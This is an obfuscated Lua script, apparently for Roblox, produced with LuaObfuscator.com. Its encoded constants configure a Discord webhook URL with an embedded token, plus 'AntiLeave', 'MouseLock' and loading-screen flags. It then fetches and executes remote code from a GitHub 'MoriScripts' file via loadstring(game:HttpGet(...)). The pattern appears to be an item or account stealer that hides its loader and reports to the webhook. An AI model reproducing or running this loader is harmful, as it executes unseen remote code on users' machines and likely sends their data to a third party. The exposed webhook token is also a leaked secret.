--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.9) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (v18==5) then v27=v24;v28=nil;function v28(...)return {...},v12("#",...);end v18=6;end if (v18==1) then v21=nil;function v21(v31,v32,v33)if v33 then local v71=0 -0 ;local v72;while true do if (v71==(0 -0)) then v72=(v31/((3 -1)^(v32-1)))%((4 -2)^(((v33-(878 -(282 + 595))) -(v32-(620 -(555 + 64)))) + (932 -(857 + (1711 -(1523 + 114)))))) ;return v72-(v72%((512 + 57) -(367 + 201))) ;end end else local v73=0;local v74;while true do if (v73==0) then v74=2^(v32-(928 -((304 -90) + 713))) ;return (((v31%(v74 + v74))>=v74) and ((1066 -(68 + 997)) + 0)) or (0 + 0) ;end end end end v22=nil;v18=2;end if (v18==3) then v24=nil;function v24()local v34,v35,v36,v37=v1(v16,v19,v19 + (1273 -(226 + 1024 + 20)) );v19=v19 + 4 ;return (v37 * (73054774 -56277558)) + (v36 * (65653 -(8 + 24 + (1042 -(892 + 65))))) + (v35 * 256) + v34 ;end v25=nil;v18=4;end if (v18==6) then v29=nil;function v29()local v38=0;local v39;local v40;local v41;local v42;local v43;local v44;while true do local v67=0;local v68;while true do if (v67==0) then v68=258 -(190 + 68) ;while true do if ((0 -0)==v68) then if (v38~=(1850 -(1409 + 441))) then else local v104=718 -(15 + 703) ;while true do if (v104==0) then v39={};v40={};v104=1;end if (v104==2) then v38=1 + 0 ;break;end if (v104==1) then v41={};v42={v39,v40,nil,v41};v104=690 -(198 + 490) ;end end end if (v38~=1) then else local v105=0;while true do if (v105==1) then for v121=4 -3 ,v43 do local v122=0 -0 ;local v123;local v124;local v125;while true do if ((1206 -(696 + 510))~=v122) then else local v182=0;while true do if (v182~=(1 -0)) then else v122=1;break;end if ((1262 -(1091 + 171))==v182) then v123=0 + 0 ;v124=nil;v182=3 -2 ;end end end if ((3 -2)==v122) then v125=nil;while true do if (v123~=(375 -(123 + 251))) then else if (v124==(4 -3)) then v125=v22()~=(698 -(208 + 490)) ;elseif (v124==(1 + 1)) then v125=v25();elseif (v124==(2 + 1)) then v125=v26();end v44[v121]=v125;break;end if (v123~=(836 -(660 + 176))) then else local v211=0;local v212;while true do if (v211~=(0 + 0)) then else v212=202 -(14 + 188) ;while true do if (v212==(675 -(534 + 141))) then local v214=0;while true do if (v214==0) then v124=v22();v125=nil;v214=1;end if (v214==1) then v212=1;break;end end end if (v212~=(1 + 0)) then else v123=1;break;end end break;end end end end break;end end end v42[3 + 0 ]=v22();v105=2;end if (v105==2) then v38=2 + 0 ;break;end if (v105==0) then v43=v24();v44={};v105=1;end end end v68=1;end if (v68==1) then if (v38==2) then local v106=0;while true do if (v106==(0 -0)) then for v126=1 -0 ,v24() do local v127=0 -0 ;local v128;local v129;local v130;local v131;while true do if (v127==0) then v128=0 + 0 ;v129=nil;v127=1 + 0 ;end if ((397 -(115 + 281))==v127) then v130=nil;v131=nil;v127=4 -2 ;end if (v127==2) then while true do if (v128==(1 + 0)) then v131=nil;while true do if (v129~=1) then else while true do if (v130==0) then v131=v22();if (v21(v131,1,2 -1 )==(0 -0)) then local v215=0;local v216;local v217;local v218;local v219;while true do if (v215==1) then v218=nil;v219=nil;v215=2;end if (v215==0) then v216=867 -(550 + 317) ;v217=nil;v215=1 -0 ;end if (v215==(2 -0)) then while true do if (0==v216) then local v220=0 -0 ;local v221;while true do if (v220~=0) then else v221=285 -(134 + 151) ;while true do if (v221==1) then v216=1666 -(970 + 695) ;break;end if (v221==(0 -0)) then local v233=1990 -(582 + 1408) ;while true do if (v233~=1) then else v221=1;break;end if (v233==0) then v217=v21(v131,2,10 -7 );v218=v21(v131,4,7 -1 );v233=1;end end end end break;end end end if (2==v216) then local v222=0;while true do if (v222~=0) then else if (v21(v218,1,3 -2 )~=(1825 -(1195 + 629))) then else v219[2]=v44[v219[2 -0 ]];end if (v21(v218,243 -(187 + 54) ,782 -(162 + 618) )~=1) then else v219[3 + 0 ]=v44[v219[3]];end v222=1;end if (v222~=1) then else v216=2 + 1 ;break;end end end if (v216~=3) then else if (v21(v218,6 -3 ,3)~=1) then else v219[6 -2 ]=v44[v219[1 + 3 ]];end v39[v126]=v219;break;end if (v216==(1637 -(1373 + 263))) then local v224=0;while true do if (v224==(1000 -(451 + 549))) then v219={v23(),v23(),nil,nil};if (v217==0) then local v231=0;local v232;while true do if ((1384 -(746 + 638))~=v231) then else v232=0 + 0 ;while true do if (v232==0) then v219[4 -1 ]=v23();v219[345 -(218 + 123) ]=v23();break;end end break;end end elseif (v217==1) then v219[3]=v24();elseif (v217==2) then v219[3]=v24() -(2^(1597 -(1535 + 46))) ;elseif (v217==3) then local v238=0;local v239;while true do if (v238==(0 + 0)) then v239=0;while true do if (v239==(0 + 0)) then v219[563 -(306 + 254) ]=v24() -(2^(1 + 15)) ;v219[4]=v23();break;end end break;end end end v224=1 -0 ;end if ((1468 -(899 + 568))==v224) then v216=2;break;end end end end break;end end end break;end end break;end if (v129~=(0 + 0)) then else v130=0 -0 ;v131=nil;v129=604 -(268 + 335) ;end end break;end if (v128==0) then local v213=290 -(60 + 230) ;while true do if (v213==(573 -(426 + 146))) then v128=1 + 0 ;break;end if (v213==0) then v129=0;v130=nil;v213=1457 -(282 + 1174) ;end end end end break;end end end for v132=1,v24() do v40[v132-(812 -(569 + 242)) ]=v29();end v106=2 -1 ;end if (v106==(1 + 0)) then return v42;end end end break;end end break;end end end end v30=nil;v18=7;end if (v18==4) then function v25()local v45=v24();local v46=v24();local v47=1025 -(706 + 318) ;local v48=(v21(v46,1252 -(721 + 530) ,20) * ((1273 -(945 + 326))^(79 -47))) + v45 ;local v49=v21(v46,(1341 -(1249 + 73)) + 2 ,731 -(271 + 429) );local v50=((v21(v46,30 + 2 )==1) and  -(1501 -(503 + 905 + (1237 -(466 + 679))))) or 1 ;if (v49==(0 -0)) then if (v48==0) then return v50 * (1086 -(461 + 625)) ;else local v80=1288 -(993 + (843 -548)) ;while true do if (v80==(0 + (1900 -(106 + 1794)))) then v49=1;v47=1171 -(418 + 753) ;break;end end end elseif (v49==(780 + 1267)) then return ((v48==(0 + 0)) and (v50 * ((1 + 0 + 0)/(0 + 0 + 0)))) or (v50 * NaN) ;end return v8(v50,v49-((4581 -3029) -(406 + 123)) ) * (v47 + (v48/((1771 -(1749 + 20))^(13 + 39)))) ;end v26=nil;function v26(v51)local v52;if  not v51 then v51=v24();if (v51==0) then return "";end end v52=v3(v16,v19,(v19 + v51) -(115 -(4 + 110)) );v19=v19 + v51 ;local v53={};for v69=2 -1 , #v52 do v53[v69]=v2(v1(v3(v52,v69,v69)));end return v6(v53);end v18=5;end if (v18==2) then function v22()local v54=584 -(57 + 527) ;local v55;while true do if (v54==1) then return v55;end if (v54==(1427 -(41 + 1386))) then v55=v1(v16,v19,v19);v19=v19 + (104 -(17 + 86)) ;v54=1 + 0 ;end end end v23=nil;function v23()local v56=(0 -0) -0 ;local v57;local v58;while true do if (v56==(2 -1)) then return (v58 * (422 -((1334 -(323 + 889)) + 44))) + v57 ;end if (0==v56) then v57,v58=v1(v16,v19,v19 + (2 -0) );v19=v19 + (6 -4) ;v56=1258 -(1043 + 214) ;end end end v18=3;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59)if (v1(v59,2)==79) then local v75=0;while true do if (v75==0) then v20=v0(v3(v59,1,1));return "";end end else local v76=v2(v0(v59,16));if v20 then local v81=0;local v82;while true do if (0==v81) then v82=v5(v76,v20);v20=nil;v81=1;end if (v81==1) then return v82;end end else return v76;end end end);v18=1;end if (v18==7) then function v30(v60,v61,v62)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v60[3];return function(...)local v83=v64;local v84=v65;local v85=v66;local v86=v28;local v87=1;local v88= -1;local v89={};local v90={...};local v91=v12("#",...) -1 ;local v92={};local v93={};for v97=0,v91 do if (v97>=v85) then v89[v97-v85 ]=v90[v97 + 1 ];else v93[v97]=v90[v97 + 1 ];end end local v94=(v91-v85) + 1 ;local v95;local v96;while true do v95=v83[v87];v96=v95[1];if (v96<=5) then if (v96<=2) then if (v96<=0) then local v107=v95[2];v93[v107]=v93[v107](v13(v93,v107 + 1 ,v88));elseif (v96>1) then v93[v95[2]]=v95[3];else local v136=v95[2];local v137,v138=v86(v93[v136](v13(v93,v136 + 1 ,v95[3])));v88=(v138 + v136) -1 ;local v139=0;for v146=v136,v88 do local v147=0;while true do if (v147==0) then v139=v139 + 1 ;v93[v146]=v137[v139];break;end end end end elseif (v96<=3) then v62[v95[3]]=v93[v95[2]];elseif (v96>4) then v93[v95[2]]();else local v140=0;while true do if (v140==5) then v95=v83[v87];v93[v95[2]][v95[3]]=v95[4];v87=v87 + 1 ;v95=v83[v87];v140=6;end if (v140==1) then v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v87=v87 + 1 ;v140=2;end if (v140==2) then v95=v83[v87];v62[v95[3]]=v93[v95[2]];v87=v87 + 1 ;v95=v83[v87];v140=3;end if (0==v140) then v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v62[v95[3]]=v93[v95[2]];v140=1;end if (v140==4) then v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v62[v95[3]];v87=v87 + 1 ;v140=5;end if (v140==3) then v93[v95[2]]=v95[3];v87=v87 + 1 ;v95=v83[v87];v62[v95[3]]=v93[v95[2]];v140=4;end if (v140==6) then v93[v95[2]]=v62[v95[3]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]][v95[3]]=v95[4];break;end end end elseif (v96<=8) then if (v96<=6) then local v111=0;local v112;local v113;local v114;local v115;local v116;while true do if (7==v111) then v112=0;for v179=v116,v88 do v112=v112 + 1 ;v93[v179]=v113[v112];end v87=v87 + 1 ;v95=v83[v87];v111=8;end if (v111==1) then v93[v95[2]][v95[3]]=v95[4];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v62[v95[3]];v111=2;end if (v111==5) then v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3]~=0 ;v87=v87 + 1 ;v111=6;end if (9==v111) then v93[v95[2]]();v87=v87 + 1 ;v95=v83[v87];do return;end break;end if (v111==0) then v112=nil;v113,v114=nil;v115=nil;v116=nil;v111=1;end if (v111==4) then v93[v116]=v115[v95[4]];v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v95[3];v111=5;end if (v111==8) then v116=v95[2];v93[v116]=v93[v116](v13(v93,v116 + 1 ,v88));v87=v87 + 1 ;v95=v83[v87];v111=9;end if (v111==2) then v87=v87 + 1 ;v95=v83[v87];v93[v95[2]]=v62[v95[3]];v87=v87 + 1 ;v111=3;end if (v111==3) then v95=v83[v87];v116=v95[2];v115=v93[v95[3]];v93[v116 + 1 ]=v115;v111=4;end if (v111==6) then v95=v83[v87];v116=v95[2];v113,v114=v86(v93[v116](v13(v93,v116 + 1 ,v95[3])));v88=(v114 + v116) -1 ;v111=7;end end elseif (v96==7) then v93[v95[2]]=v62[v95[3]];else v93[v95[2]]=v95[3]~=0 ;end elseif (v96<=9) then local v117=0;local v118;local v119;while true do if (1==v117) then v93[v118 + 1 ]=v119;v93[v118]=v119[v95[4]];break;end if (v117==0) then v118=v95[2];v119=v93[v95[3]];v117=1;end end elseif (v96==10) then do return;end else v93[v95[2]][v95[3]]=v95[4];end v87=v87 + 1 ;end end;end if (v63==0) then v64=v60[1];v65=v60[2];v63=1;end end end return v30(v29(),{},v17)(...);end end end v15("LOL!0E3O0003083O00557365724E616D6503083O005A652O6E3233343503073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31303735333730373631392O3238343732332F6A64702D6C5F36444C6E57457A5772416A5A71754337474F6F652O79644F65784E526F57747765595355476B506F33456C48575831572D6E5945776C677547522O43346303093O00557365724E616D653203023O005F47030D3O004C6F6164696E675363722O656E2O0103093O00416E74694C6561766503093O004D6F7573654C6F636B030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4C7970686572582F4D6F7269536372697074732F6D61696E2F4D6F72695363726970745A00153O0012043O00023O00124O00013O00124O00043O00124O00033O00124O00023O00124O00053O00124O00063O00304O0007000800124O00063O00304O000900080012073O00063O0030063O000A000800124O000B3O00122O0001000C3O00202O00010001000D00122O0003000E6O000400016O000100049O0000026O000100016O00017O00",v9(),...);end
